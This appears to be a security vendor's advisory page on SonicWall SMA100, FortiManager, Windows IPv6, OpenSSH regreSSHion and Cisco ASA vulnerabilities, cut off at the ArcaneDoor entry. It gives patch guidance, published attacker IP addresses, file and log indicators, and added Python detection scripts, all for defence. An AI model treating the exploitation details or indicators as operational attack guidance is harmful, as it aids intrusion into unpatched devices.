    CVE-2024-45319 | Medium - 6.3 | A vulnerability in the SonicWall SMA100 SSLVPN allows a remote, authenticated attacker to circumvent the certificate requirement during authentication.
    CVE-2024-38475 | High - 7.5   | Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to file system locations that are permitted to be served by the server.
    CVE-2024-40763 | High - 7.5   | Heap-based buffer overflow vulnerability in the SonicWall SMA100 SSLVPN due to the use of strcpy. This allows remote authenticated attackers to cause Heap-based buffer overflow and potentially lead to code execution.
    CVE-2024-45318 | High - 8.1   | A vulnerability in the SonicWall SMA100 SSLVPN web management interface allows remote attackers to cause Stack-based buffer overflow and potentially lead to code execution without prior authentication.
    CVE-2024-53703 | High - 8.1   | A vulnerability in the SonicWall SMA100 SSLVPN mod_httprp library loaded by the Apache web server allows remote attackers to cause Stack-based buffer overflow and potentially lead to code execution without prior authentication.


    While all of these vulnerabilities are important to be aware of, the last three are the most notable as they can lead to remote code execution. Additionally, of the CVEs with potential for remote code execution, two have been confirmed not to require any prior authentication (CVE-2024-45318 and CVE-2024-53703).

    SonicWall has stated that, “There is no evidence that these vulnerabilities are being exploited in the wild and SonicWall SSL VPN SMA1000 series products are not affected by these vulnerabilities.” However, this can change at any time and with the holidays just around the corner, it’s possible malicious actors may opt to save these vulnerabilities for just the right time, optimizing their impact. Fortunately, SonicWall has addressed all six of these vulnerabilities in a recent patch and is urging users to patch their SMA 100 series devices to 10.2.1.14-75sv and higher versions.

    SonicWall has also confirmed that there is no advisable workaround and suggests that patching is the only method to address these vulnerabilities in affected systems.

    What That Means

    Administrators managing SonicWall SMA 100 series devices should patch immediately. With three vulnerabilities leading to possible remote code execution and two of those not requiring prior authentication, the potential for exploitation is pretty high. Vulnerabilities that require no authentication are more easily targeted and exploited on a mass scale. Due to a lack of authentication requirements, malicious actors are easily able to automate the scanning for and exploitation of unauthenticated remote code execution. It is also more difficult to track such exploits as authentication logs will leave little to no trace of this activity.

    Who’s Impacted

    The following table and notes have been directly lifted from the SonicWall SNWLID-2024-0018 Advisory.

    Affected Product(s)

    Affected Product(s)                            | Affected Versions
    -----------------------------------------------+-------------------------------------
    SMA 100 Series (SMA 200, 210, 400, 410, 500v)  | 10.2.1.13-72sv and earlier versions.

    How Would I Know and What Should I Do

    At this time, SonicWall has not released any indicators of compromise or any details regarding what to look for should you suspect your systems are being targeted.

    Without specifics around exploitation, administrators should be on the lookout for unusual behavior in their environment, especially anything related to any unpatched SMA 100 series devices. This includes, but is not limited to:

    • Unusual or unexpected login attempts to the admin portal or SSLVPN
    • Unexpected changes to the configuration of SMA devices
    • Activity related to SMA backup files
    • Unusual commands initiated via the SMA CLI

    If you suspect an SMA device has been compromised, you should immediately attempt to contain the incident and establish a scope. In some cases, it may be advisable to disconnect the SMA device, recover from a known-good backup, and apply the latest patches before bringing it back online. It is also recommended to rotate any administrator or user account passwords local to the compromised device.

    When Will it be Fixed?

    Patches are available and have been released by SonicWall.

    Fixed Software

    Fixed Product(s)                               | Fixed Versions
    -----------------------------------------------+---------------------------------
    SMA 100 Series (SMA 200, 210, 400, 410, 500v)  | 10.2.1.14-75sv and higher versions.

    How Blumira Can Help

    Blumira’s security team actively monitors this issue and looks for additional ways that we can detect any stage of exploitation of these vulnerabilities.

    We offer several pre-configured system reports that allow you to review SonicWall configuration changes, IDP/IPS alerts, VPN connections, and Administrator login activity.

    Additionally, we have several detections to alert you when an Administrator account has logged in, configuration changes have been made, or brute force login activity is identified on your SonicWall device. Note that the detections, SonicWall: Configuration Change and Sonicwall: Administrator Login Allowed are disabled by default and must be manually enabled.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Critical
    October 24, 2024

    CVE-2024-47575: FortiManager Remote Access Exploit

    On October 23, 2024, FortiGuard Labs released a PSIRT advisory detailing a critical vulnerability in FortiManager fgfmd daemon which “may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.”

    What Happened

    On October 23, 2024, FortiGuard Labs released a PSIRT advisory detailing a critical vulnerability in FortiManager fgfmd daemon which “may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.” This vulnerability has been recorded by NVD and assigned the CVE-ID CVE-2024-47575 and carries with it a critical severity CVSSv3 score of 9.8.

    This vulnerability has been unofficially named “FortiJump” by researcher Kevin Beaumont, who was among the first to raise concerns that a potentially high-risk vulnerability was on the horizon. Ten days after Beaumont’s initial post on the social media platform Mastodon, FortiGuard Labs released their own official statement and not only confirmed the existence of this vulnerability, but also revealed they had evidence that it is actively being exploited in the wild.

    This vulnerability is the result of an insecure implementation of how managed devices are registered with FortiManager. By default, any device is allowed to register with FortiManager as a managed device. Malicious actors can use this to register their own rogue device and exploit FortiManager to access managed FortiGate firewalls and exfiltrate or make changes to configuration files, credentials, or other sensitive data.

    What That Means

    Administrators who manage FortiManager services should patch as soon as possible. The exploitation seems relatively trivial but the potential impact is extreme, considering this vulnerability provides access to devices used to protect and secure networks. Failure to patch quickly could result in threat actors gaining access to company networks and configuring services or accounts for backdoor access and persistence. Exfiltrated configuration files, users, and passwords can be saved by threat actors for future reconnaissance and attacks.

    While no proof of concept code has been released as of the writing of this article (October 24, 2024), active exploitation has been seen in the wild.

    Who’s Impacted

    The following table and notes have been directly lifted from the FortiGuard PSIRT advisory.

    Version                 | Affected             | Solution
    ------------------------+----------------------+----------------------------
    FortiManager 7.6        | 7.6.0                | Upgrade to 7.6.1 or above
    FortiManager 7.4        | 7.4.0 through 7.4.4  | Upgrade to 7.4.5 or above
    FortiManager 7.2        | 7.2.0 through 7.2.7  | Upgrade to 7.2.8 or above
    FortiManager 7.0        | 7.0.0 through 7.0.12 | Upgrade to 7.0.13 or above
    FortiManager 6.4        | 6.4.0 through 6.4.14 | Upgrade to 6.4.15 or above
    FortiManager 6.2        | 6.2.0 through 6.2.12 | Upgrade to 6.2.13 or above
    FortiManager Cloud 7.6  | Not affected         | Not Applicable
    FortiManager Cloud 7.4  | 7.4.1 through 7.4.4  | Upgrade to 7.4.5 or above
    FortiManager Cloud 7.2  | 7.2.1 through 7.2.7  | Upgrade to 7.2.8 or above
    FortiManager Cloud 7.0  | 7.0.1 through 7.0.12 | Upgrade to 7.0.13 or above
    FortiManager Cloud 6.4  | 6.4 all versions     | Migrate to a fixed release

    Old FortiAnalyzer models 1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, 3900E with the following feature enabled (FortiManager on FortiAnalyzer):

        config system global
            set fmg-status enable
        end

    and at least one interface with the fgfm service enabled are also impacted by this vulnerability.

    How Would I Know and What Should I Do

    Blumira has released a new detection to all of our Fortinet customers. Titled “FortiGate: FortiManager CVE-2024-47575 Missing authentication in fgfmsd”, this detection monitors for the initial steps taken by a threat actor to register their rogue device with FortiManager. If you are already shipping your Fortinet device logs to Blumira, this rule will automatically be deployed and enabled for you. We have also retroactively scanned the last 30 days of customer Fortinet logs to verify no compromise occurred before we were able to develop and release the detection (should we identify any suspicious behavior, our Security Operations team will reach out).

    Several indicators of compromise (IOC) have been released by the FortiGuard Labs team:

    Log entries:

    type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",user="device,...",msg="Unregistered device localhost add succeeded" device="localhost" adom="FortiManager" session_id=0 operation="Add device" performed_on="localhost" changes="Unregistered device localhost add succeeded"

    type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",user="System",userfrom="",msg="" adom="root" session_id=0 operation="Modify device" performed_on="localhost" changes="Edited device settings (SN FMG-VMTM23017412)"

    IP addresses:

    45.32.41.202
    104.238.141.143
    158.247.199.37
    45.32.63.2

    Serial number:

    FMG-VMTM23017412

    Files:

    /tmp/.tm
    /var/tmp/.tm
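    To show how the published log indicators translate into a detection, here is an added example (not Fortinet's or Blumira's code): a parser for the key=value FortiManager event format shown above and a detect() function that flags an "Add device" operation for an unregistered device, the rogue serial number, and the listed IP addresses. The first two sample lines are the log entries quoted above; the third is a constructed benign control line and is not from the advisory.

```python
import re
from typing import Iterable

# Indicators published by FortiGuard Labs (from the list above).
IOC_IPS = {"45.32.41.202", "104.238.141.143", "158.247.199.37", "45.32.63.2"}
IOC_SERIALS = {"FMG-VMTM23017412"}

# key=value pairs; a value is either double-quoted or runs to the next space or comma.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]*))')
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_fmg_log(line: str) -> dict[str, str]:
    """Parse one FortiManager event log line into a field dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}


def detect(line: str) -> list[str]:
    """Return the indicator names the line matches (empty list if none)."""
    fields = parse_fmg_log(line)
    reasons = []
    # The rogue-registration step: an unregistered device being added through dvm.
    if (fields.get("subtype") == "dvm"
            and fields.get("operation") == "Add device"
            and "Unregistered device" in fields.get("msg", "")):
        reasons.append("unregistered-device-added")
    # The attacker serial number can appear in any field (above it is in "changes").
    if any(sn in v for sn in IOC_SERIALS for v in fields.values()):
        reasons.append("ioc-serial-number")
    if set(IPV4_RE.findall(line)) & IOC_IPS:
        reasons.append("ioc-ip-address")
    return reasons


def scan(lines: Iterable[str]) -> list[tuple[int, list[str]]]:
    """Run detect() over a log and return (line_number, reasons) for hits only."""
    hits = []
    for n, line in enumerate(lines, start=1):
        reasons = detect(line)
        if reasons:
            hits.append((n, reasons))
    return hits


SAMPLE_LINES = [
    # The two log entries quoted from the advisory above.
    'type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",user="device,...",msg="Unregistered device localhost add succeeded" device="localhost" adom="FortiManager" session_id=0 operation="Add device" performed_on="localhost" changes="Unregistered device localhost add succeeded"',
    'type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",user="System",userfrom="",msg="" adom="root" session_id=0 operation="Modify device" performed_on="localhost" changes="Edited device settings (SN FMG-VMTM23017412)"',
    # Constructed benign control line (not from the advisory): an admin edit of a known device.
    'type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",user="admin",userfrom="gui(192.0.2.10)",msg="" adom="root" session_id=42 operation="Modify device" performed_on="FGT-branch-01" changes="Edited device settings (SN CONSTRUCTED000001)"',
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LINES):
        print(f"line {n}: {', '.join(reasons)}")
```

    The first rule is the one worth keeping after the specific IPs and serial have aged out: on a FortiManager where every legitimate FortiGate is pre-provisioned, an "Add device" for an unregistered device is itself the anomaly.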

    Workarounds

    Additionally, the FortiGuard Labs team has advised on several workarounds if a patch cannot be applied immediately. Note that for older versions (6.2, 6.4, and 7.0.11 and below), it is advised to apply the patch and the workarounds:

    1. For FortiManager versions 7.0.12 or above, 7.2.5 or above, 7.4.3 or above (but not 7.6.0), prevent unknown devices from attempting to register:

        config system global
            set fgfm-deny-unknown enable
        end

    Warning: With this setting enabled, be aware that if a FortiGate's SN is not in the device list, FortiManager will prevent it from connecting to register upon being deployed, even when a model device with PSK is matching.

    2. Alternatively, for FortiManager versions 7.2.0 and above, you may add local-in policies to whitelist the IP addresses of FortiGates that are allowed to connect (the second entry, which has no accept action, is what blocks port 541 for every other source).

    Example:

        config system local-in-policy
            edit 1
                set action accept
                set dport 541
                set src
            next
            edit 2
                set dport 541
            next
        end

    3. For 7.2.2 and above, 7.4.0 and above, and 7.6.0 and above, it is also possible to use a custom certificate, which will mitigate the issue:

        config system global
            set fgfm-ca-cert
            set fgfm-cert-exclusive enable
        end

    Then install that certificate on the FortiGates. Only this CA will be accepted, so this acts as a workaround provided the attacker cannot obtain a certificate signed by this CA through another channel.

    For FortiManager versions 6.2, 6.4, and 7.0.11 and below, please upgrade to one of the versions above and apply the above workarounds.

    When Will it be Fixed?

    Patches are available and have been released by Fortinet. Please refer to the table above to see if you are affected.

    How Blumira Can Help

    Blumira continues to actively monitor this issue and look for any additional ways that we can detect any stage of exploitation of these vulnerabilities.

    If you are an MSP and not already using Blumira, please submit a request for a “free for internal use” NFR account.

    The Blumira Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Critical
    September 23, 2024

    CVE-2024-38063 Windows TCP/IP Remote Code Execution Vulnerability

    On August 13th, 2024, Microsoft issued a critical advisory for a vulnerability identified in IPv6 components used by the Windows operating system. 

    What Happened

    On August 13th, 2024, Microsoft issued a critical advisory for a vulnerability identified in IPv6 components used by the Windows operating system. This vulnerability within the Windows TCP/IP stack could potentially allow attackers to perform remote code execution (RCE) by flooding victim endpoints with IPv6 packets, triggering an integer underflow state. Windows-based endpoints with IPv6 enabled are all potentially vulnerable to this exploit. Due to the exposure of endpoints with IPv6 enabled and the impact this vulnerability could have, CVE-2024-38063 has been scored a 9.8 (Critical) on the CVSS scale.

    Proof of concept (PoC) code has been released, however, it is unable to trigger actual remote code execution. It’s not completely harmless, though, as it has been proven to allow for denial of service (DoS) on victim endpoints by causing a blue screen of death (BSOD) crash. Additionally, the PoC author believes that threat actors with enough patience and expertise would be able to use this PoC to implement a true remote code execution attack.

    What That Means

    At first glance, this CVE seems almost as bad as it can get; however, there are some additional considerations to take into account before jumping into action. This vulnerability only affects Windows endpoints that have IPv6 enabled. This is a feature that is enabled by default; however, it is also understood that a victim would need to actually have an IPv6 address assigned. For an endpoint to truly be vulnerable, it must have IPv6 enabled and have an IPv6 address. The proof of concept code requires that the attacker system can talk to the victim system over IPv6. Systems with IPv6 disabled are not vulnerable to this exploit.

    If the victim system is vulnerable to this attack and is targeted by the single currently known PoC, the victim will see a large influx of IPv6 traffic before it locks up in a blue screen of death crash. To see this in action or read up on any of the technical details, take a look at the author’s code on GitHub.

    Microsoft has provided official security patches for this vulnerability in the August monthly rollup and cumulative security updates for affected Windows 10, Windows 11, and Windows Server systems.

    At this time, Microsoft has not observed any exploitation of CVE-2024-38063 in the wild.

    Who’s Impacted

    The following devices are impacted:

    • Windows 10
    • Windows 11
    • Windows Server 2008
    • Windows Server 2008 R2
    • Windows Server 2012
    • Windows Server 2012 R2
    • Windows Server 2016
    • Windows Server 2022

    How Would I Know and What Should I Do

    Update Windows systems - the updates provided by Microsoft have been rolled out and should be applied automatically through the typical Windows Update process. See the bottom section of this article for update information specific to each affected operating system.

    If updating is not possible, consider disabling IPv6 if it is not needed. This should be considered only a temporary fix as the most recommended and long-term solution would be to apply patches. Take care when disabling IPv6 on critical infrastructure as it may cause some unanticipated network disruptions.

    Monitor your network for abnormally large amounts of IPv6 traffic directed at single targets. If systems are being targeted for this CVE, they may experience instability or crashing.
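    The monitoring advice above, turned into an added example (not Microsoft's or Blumira's code): a threshold detector over flow records that reports any IPv6 destination receiving an abnormally large packet count within a sliding time window, together with the distinct sources involved. The Flow tuple, the window size and the threshold are assumptions made for this example, as are the sample flows (documentation prefixes, not real traffic); tune the window and threshold against a baseline of your own normal IPv6 traffic before alerting on them.

```python
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Iterable


@dataclass(frozen=True)
class Flow:
    """One flow record: timestamp (seconds), source, destination, packet count."""
    ts: float
    src: str
    dst: str
    packets: int


def ipv6_flows(flows: Iterable[Flow]) -> list[Flow]:
    """Keep only flows whose destination is an IPv6 address, sorted by time."""
    return sorted((f for f in flows if ip_address(f.dst).version == 6), key=lambda f: f.ts)


def find_targets(flows: Iterable[Flow], window_s: float = 10.0, threshold: int = 1000) -> dict[str, dict]:
    """Return destinations that received more than `threshold` IPv6 packets inside
    any sliding window of `window_s` seconds, with the peak count and the distinct
    sources seen. Both parameters are assumed defaults, not measured values."""
    by_dst: dict[str, list[Flow]] = defaultdict(list)
    for f in ipv6_flows(flows):
        by_dst[f.dst].append(f)

    alerts = {}
    for dst, recs in by_dst.items():
        start, running, peak = 0, 0, 0
        for rec in recs:
            running += rec.packets
            # Slide the window forward until it spans at most window_s seconds.
            while rec.ts - recs[start].ts > window_s:
                running -= recs[start].packets
                start += 1
            peak = max(peak, running)
        if peak > threshold:
            alerts[dst] = {"peak_packets": peak, "sources": sorted({r.src for r in recs})}
    return alerts


# Constructed flow records (documentation prefixes, not real traffic).
SAMPLE_FLOWS = (
    [Flow(t, "2001:db8::1", "2001:db8::10", 50) for t in range(30)]                # steady background
    + [Flow(100 + t, "2001:db8:dead::beef", "2001:db8::20", 400) for t in range(5)]  # burst at one host
    + [Flow(t, "192.0.2.7", "198.51.100.9", 5000) for t in range(3)]                # IPv4, ignored
)

if __name__ == "__main__":
    for dst, info in find_targets(SAMPLE_FLOWS).items():
        print(f"{dst}: peak {info['peak_packets']} packets in 10 s from {info['sources']}")
```

    A destination that trips the threshold and then stops reporting flows (or whose host reboots shortly after) is the pattern to correlate with the crash behaviour described above.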

    When Will Microsoft Fix It

    As of 2024-08-13, Microsoft has released updates for all supported and affected systems.

    Release date | Product | Article | Download | Build Number
    -------------+---------+---------+----------+-------------
    Aug 13, 2024 | Windows 11 Version 24H2 for x64-based Systems | 5041571 | Security Update | 10.0.26100.1457
    Aug 13, 2024 | Windows 11 Version 24H2 for ARM64-based Systems | 5041571 | Security Update | 10.0.26100.1457
    Aug 13, 2024 | Windows Server 2012 R2 (Server Core installation) | 5041828 | Monthly Rollup | 6.3.9600.22134
    Aug 13, 2024 | Windows Server 2012 R2 | 5041828 | Monthly Rollup | 6.3.9600.22134
    Aug 13, 2024 | Windows Server 2012 (Server Core installation) | 5041851 | Monthly Rollup | 6.2.9200.25031
    Aug 13, 2024 | Windows Server 2012 | 5041851 | Monthly Rollup | 6.2.9200.25031
    Aug 13, 2024 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) | 5041838 | Monthly Rollup | 6.1.7601.27277
    Aug 13, 2024 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) | 5041823 | Security Only | 6.1.7601.27277
    Aug 13, 2024 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 | 5041838 | Monthly Rollup | 6.1.7601.27277
    Aug 13, 2024 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 | 5041823 | Security Only | 6.1.7601.27277
    Aug 13, 2024 | Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) | 5041850 | Monthly Rollup | 6.0.6003.22825
    Aug 13, 2024 | Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) | 5041847 | Security Only | 6.0.6003.22825
    Aug 13, 2024 | Windows Server 2008 for x64-based Systems Service Pack 2 | 5041850 | Monthly Rollup | 6.0.6003.22825
    Aug 13, 2024 | Windows Server 2008 for x64-based Systems Service Pack 2 | 5041847 | Security Only | 6.0.6003.22825
    Aug 13, 2024 | Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) | 5041850 | Monthly Rollup | 6.0.6003.22825
    Aug 13, 2024 | Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) | 5041847 | Security Only | 6.0.6003.22825
    Aug 13, 2024 | Windows Server 2008 for 32-bit Systems Service Pack 2 | 5041850 | Monthly Rollup | 6.0.6003.22825
    Aug 13, 2024 | Windows Server 2008 for 32-bit Systems Service Pack 2 | 5041847 | Security Only | 6.0.6003.22825
    Aug 13, 2024 | Windows Server 2016 (Server Core installation) | 5041773 | Security Update | 10.0.14393.7259
    Aug 13, 2024 | Windows Server 2016 | 5041773 | Security Update | 10.0.14393.7259
    Aug 13, 2024 | Windows 10 Version 1607 for x64-based Systems | 5041773 | Security Update | 10.0.14393.7259
    Aug 13, 2024 | Windows 10 Version 1607 for 32-bit Systems | 5041773 | Security Update | 10.0.14393.7259
    Aug 13, 2024 | Windows 10 for x64-based Systems | 5041782 | Security Update | 10.0.10240.20751
    Aug 13, 2024 | Windows 10 for 32-bit Systems | 5041782 | Security Update | 10.0.10240.20751
    Aug 13, 2024 | Windows Server 2022, 23H2 Edition (Server Core installation) | 5041573 | Security Update | 10.0.25398.1085
    Aug 13, 2024 | Windows 11 Version 23H2 for x64-based Systems | 5041585 | Security Update | 10.0.22631.4037
    Aug 13, 2024 | Windows 11 Version 23H2 for ARM64-based Systems | 5041585 | Security Update | 10.0.22631.4037
    Aug 13, 2024 | Windows 10 Version 22H2 for 32-bit Systems | 5041580 | Security Update | 10.0.19045.4780
    Aug 13, 2024 | Windows 10 Version 22H2 for ARM64-based Systems | 5041580 | Security Update | 10.0.19045.4780
    Aug 13, 2024 | Windows 10 Version 22H2 for x64-based Systems | 5041580 | Security Update | 10.0.19045.4780
    Aug 13, 2024 | Windows 11 Version 22H2 for x64-based Systems | 5041585 | Security Update | 10.0.22621.4037
    Aug 13, 2024 | Windows 11 Version 22H2 for ARM64-based Systems | 5041585 | Security Update | 10.0.22621.4037
    Aug 13, 2024 | Windows 10 Version 21H2 for x64-based Systems | 5041580 | Security Update | 10.0.19044.4780
    Aug 13, 2024 | Windows 10 Version 21H2 for ARM64-based Systems | 5041580 | Security Update | 10.0.19044.4780
    Aug 13, 2024 | Windows 10 Version 21H2 for 32-bit Systems | 5041580 | Security Update | 10.0.19044.4780
    Aug 13, 2024 | Windows 11 version 21H2 for ARM64-based Systems | 5043067 | Security Update | 10.0.22000.3197
    Aug 13, 2024 | Windows 11 version 21H2 for x64-based Systems | 5043067 | Security Update | 10.0.22000.3197
    Aug 13, 2024 | Windows Server 2022 (Server Core installation) | 5042881 | Security Update | 10.0.20348.2700
    Aug 13, 2024 | Windows Server 2022 | 5042881 | Security Update | 10.0.20348.2700
    Aug 13, 2024 | Windows Server 2019 (Server Core installation) | 5043050 | Security Update | 10.0.17763.6293
    Aug 13, 2024 | Windows Server 2019 | 5043050 | Security Update | 10.0.17763.6293
    Aug 13, 2024 | Windows 10 Version 1809 for ARM64-based Systems | 5043050 | Security Update | 10.0.17763.6293
    Aug 13, 2024 | Windows 10 Version 1809 for x64-based Systems | 5043050 | Security Update | 10.0.17763.6293
    Aug 13, 2024 | Windows 10 Version 1809 for 32-bit Systems | 5043050 | Security Update | 10.0.17763.6293

    How Blumira Can Help

    Blumira continues to actively monitor this issue and look for ways that we can detect any stage of exploitation of these vulnerabilities.

    If you are an MSP and not already using Blumira, please submit a request for a “free for internal use” NFR account.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.



    Critical
    July 1, 2024

    How to Mitigate OpenSSH RCE Flaw CVE-2006-5051

    Security researchers at Qualys have identified a race condition vulnerability in OpenSSH server (sshd) that could result in remote code execution (RCE) with root privileges. This vulnerability is being tracked as CVE-2024-6387 and has been unofficially dubbed, “regreSSHion” by the Qualys team.

    What Happened?

    Security researchers at Qualys have identified a race condition vulnerability in OpenSSH server (sshd) that could result in remote code execution (RCE) with root privileges. This vulnerability is being tracked as CVE-2024-6387 and has been unofficially dubbed “regreSSHion” by the Qualys team. It was given this name because its presence reveals a patch regression in OpenSSH server: this vulnerability was previously identified and patched in 2006 (OpenSSH 4.4p1) under CVE-2006-5051. After being properly mitigated in 2006, the vulnerability was accidentally reintroduced in October 2020 (OpenSSH 8.5p1). A patch was made available on July 1st 2024 by the OpenSSH team; upgrading OpenSSH server to the latest version (9.8p1) mitigates this vulnerability.

    How Bad is This?

    Remote code execution with root privileges is never a good thing when it rears its ugly head. However, the difficulty of exploitation for this vulnerability and its somewhat limited attack surface reduces the overall criticality. Don’t get me wrong - this is still a big vulnerability that should be taken seriously, but it’s not exactly as scary as it seems at first glance. According to OpenSSH’s official patch notes:

    Successful exploitation has been demonstrated on 32-bit Linux/glibc systems with ASLR. Under lab conditions, the attack requires on average 6-8 hours of continuous connections up to the maximum the server will accept. Exploitation on 64-bit systems is believed to be possible but has not been demonstrated at this time. It's likely that these attacks will be improved upon.

    Exploitation on non-glibc systems is conceivable but has not been examined. Systems that lack ASLR or users of downstream Linux distributions that have modified OpenSSH to disable per-connection ASLR re-randomisation (yes - this is a thing, no - we don't understand why) may potentially have an easier path to exploitation. OpenBSD is not vulnerable.

    Additionally, macOS and Windows have their own versions of OpenSSH server that may also be affected by this vulnerability; however, this has not been confirmed by either the OpenSSH or Qualys teams. No “Proof of Concept” exploit code has been released for this vulnerability and no exploits have been observed in the wild at this time.

    Affected versions:

    OpenSSH servers running on Linux/glibc systems with ASLR (most modern Linux distributions)

    • sshd versions older than 4.4p1
    • sshd versions between 8.5p1 and 9.7p1 (inclusive)

    What Should I Do?

    Identify any Linux systems running vulnerable versions of OpenSSH in your environment, especially systems exposed to the internet. Don’t forget about any IoT devices running Linux - these may not be as easily patchable, but identifying these systems and checking vendor documentation may help you understand if these systems are vulnerable. If you need some help identifying which openssh-server version your systems are running, see this helpful tutorial.

    Running the command sshd -V is the simplest way to check your OpenSSH server version.

    Once you’ve identified systems that need patching, apply the latest patches from OpenSSH (9.8p1).

    If you are unable to apply patches, consider disabling/uninstalling the sshd service or limiting access to the service to very specific devices and/or IP addresses. Alternatively, setting LoginGraceTime to 0 in the sshd configuration file (located at /etc/ssh/sshd_config) will mitigate the remote code execution risk of this exploit, but will expose sshd to a denial of service (annoying, but more desirable than RCE for sure).

    If you see consistent and repeated “Timeout before authentication” messages in the logs for affected devices, this may be an indication of attempts at exploitation.
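    The two checks above (version inventory and the "Timeout before authentication" log signal), as an added example that is not OpenSSH's, Qualys's, or Blumira's code: a Python snippet that pulls the upstream version out of an OpenSSH version banner such as the one sshd -V prints, applies the affected ranges listed above (older than 4.4p1, or 8.5p1 through 9.7p1 inclusive), and counts timeout messages per source address in sshd log lines. The banner strings and log lines are constructed; the min_events threshold is an assumption to tune.

```python
import re
from collections import Counter
from typing import Iterable, Optional

VERSION_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)(?:p(\d+))?")
# sshd logs "Timeout before authentication for <ip> port <port>" when
# LoginGraceTime expires without a completed login.
TIMEOUT_RE = re.compile(r"Timeout before authentication for (\S+) port \d+")

FIXED_2006 = (4, 4, 1)     # CVE-2006-5051 fixed in 4.4p1
REGRESSED = (8, 5, 1)      # bug reintroduced in 8.5p1
LAST_AFFECTED = (9, 7, 1)  # 9.8p1 carries the fix


def parse_version(banner: str) -> Optional[tuple[int, int, int]]:
    """Extract (major, minor, portable-level) from text such as
    'OpenSSH_9.6p1 Ubuntu-3ubuntu13.4, OpenSSL 3.0.13 30 Jan 2024'."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_affected_version(banner: str) -> Optional[bool]:
    """True if the upstream version falls in an affected range, False if not,
    None if no OpenSSH version could be found in the text.

    Caveat: distributions backport fixes without changing the upstream version
    (an "OpenSSH_9.6p1" package may already be patched), so treat True as
    "check the distro advisory", not as proof of vulnerability."""
    v = parse_version(banner)
    if v is None:
        return None
    return v < FIXED_2006 or REGRESSED <= v <= LAST_AFFECTED


def timeout_counts(lines: Iterable[str]) -> Counter:
    """Count 'Timeout before authentication' events per source address."""
    counts: Counter = Counter()
    for line in lines:
        m = TIMEOUT_RE.search(line)
        if m:
            counts[m.group(1)] += 1
    return counts


def noisy_sources(lines: Iterable[str], min_events: int = 5) -> list[tuple[str, int]]:
    """Sources with at least `min_events` timeouts, most frequent first.
    min_events is an assumed threshold; a single timeout is normal noise."""
    return [(ip, n) for ip, n in timeout_counts(lines).most_common() if n >= min_events]


# Constructed sshd log lines in the usual syslog layout (documentation addresses).
SAMPLE_LOG = (
    [f"Jul  1 10:{i:02d}:00 host sshd[{1000 + i}]: Timeout before authentication "
     f"for 203.0.113.5 port {50000 + i}" for i in range(8)]
    + ["Jul  1 10:09:00 host sshd[2000]: Timeout before authentication for 198.51.100.7 port 40001",
       "Jul  1 10:10:00 host sshd[2001]: Accepted publickey for alice from 192.0.2.10 port 40002 ssh2"]
)

if __name__ == "__main__":
    for banner in ("OpenSSH_9.6p1 Ubuntu-3ubuntu13.4, OpenSSL 3.0.13 30 Jan 2024",
                   "OpenSSH_9.8p1, OpenSSL 3.3.1 4 Jun 2024"):
        print(banner.split(",")[0], "-> affected range:", is_affected_version(banner))
    print("repeated timeouts:", noisy_sources(SAMPLE_LOG))
```

    Feed the output of sshd -V from each host into is_affected_version to build the inventory, and run noisy_sources over /var/log/auth.log (or the journal) on the hosts that remain unpatched.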

    Distro-specific notices:

    How Blumira Can Help

    Blumira has several detections that may help uncover unexpected or suspicious SSH activity:

    • Unix/Linux: Failed SSH Connection Attempt (default disabled)
    • SSH Connection from Public IP

    Note: since Unix/Linux: Failed SSH Connection Attempt is disabled by default, you will need to enable it manually in the Blumira app if you have not already done so.

    Blumira continues to actively monitor this issue and look for ways that we can detect any stage of exploitation of these vulnerabilities.

    If you are an MSP and not already using Blumira, please submit a request for a “free for internal use” NFR account.

    Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Critical
    April 25, 2024

    Cisco ASA & FTD Firewalls: ArcaneDoor Attacks


    Update 4.29.24 3:37PM ET:

    One new detection and one new global report have been released to track ArcaneDoor activity.

    Detection: Cisco ASA: ArcaneDoor IOC IP Addresses

    • This detection monitors ASA system and traffic logs for connections to IP addresses called out in this article from Cisco Talos.
    • This detection is in the process of being deployed to all of our customers sending Cisco ASA logs. This is a default enabled detection.

    Report: Cisco ASA: ArcaneDoor Activity Audit

    • This global report presents audit events with the specific logcodes called out in this article from the Canadian Center for Cyber Security.

    I also wanted to specifically call out that the existing detection, "Cisco ASA: Excessive Authentication Errors", may help identify brute forcing and password spraying against these devices. This is a default-disabled detection, so you will need to enable it in your Blumira tenant if you have not already done so.

    What Happened?

